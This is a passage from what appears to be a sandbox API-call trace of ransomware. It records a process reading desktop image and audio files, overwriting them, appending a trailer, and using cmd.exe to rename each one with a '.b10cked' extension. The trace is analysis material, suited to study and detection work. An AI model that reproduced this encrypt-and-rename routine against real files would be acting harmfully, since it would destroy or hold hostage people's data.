lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.401] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x66ac [0219.401] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.401] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.401] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6b94 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6b94 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.402] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c9, lpOverlapped=0x0) returned 1 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.402] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x35c9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x35c9, lpOverlapped=0x0) returned 1 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-13769, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35cb [0219.402] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c9, lpOverlapped=0x0) returned 1 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-13769, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35cb [0219.402] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x35c9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x35c9, lpOverlapped=0x0) returned 1 [0219.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6UVpef.wav", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6UVpef.wav", cchWideChar=10, lpMultiByteStr=0x131322c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6UVpef.wav", lpUsedDefaultChar=0x0) returned 10 [0219.406] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6b94 [0219.406] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.406] CloseHandle (hObject=0x1b4) returned 1 [0219.407] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav") returned 0x23 [0219.429] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.429] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xcb0, dwThreadId=0xeb8)) returned 1 [0219.448] CloseHandle (hObject=0x120) returned 1 [0219.448] CloseHandle (hObject=0x1b4) returned 1 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.448] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.448] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.449] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.449] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.449] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27623829239) returned 1 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.451] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1271d [0219.451] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x12c05 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x12c05 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.452] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9601, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9601, lpOverlapped=0x0) returned 1 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.452] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9601, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9601, lpOverlapped=0x0) returned 1 [0219.453] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-38401, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9604 [0219.453] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9601, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9601, lpOverlapped=0x0) returned 1 [0219.453] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-38401, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9604 [0219.453] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9601, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9601, lpOverlapped=0x0) returned 1 [0219.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="95ICx9P6yb.bmp", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="95ICx9P6yb.bmp", cchWideChar=14, lpMultiByteStr=0x13131ec, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="95ICx9P6yb.bmp", lpUsedDefaultChar=0x0) returned 14 [0219.457] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x12c05 [0219.457] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.458] CloseHandle (hObject=0x1b4) returned 1 [0219.458] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP") returned 0x25 [0219.459] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.459] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x918, dwThreadId=0xcd8)) returned 1 [0219.462] CloseHandle (hObject=0x120) returned 1 [0219.462] CloseHandle (hObject=0x1b4) returned 1 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.462] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.462] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.463] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27625202627) returned 1 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 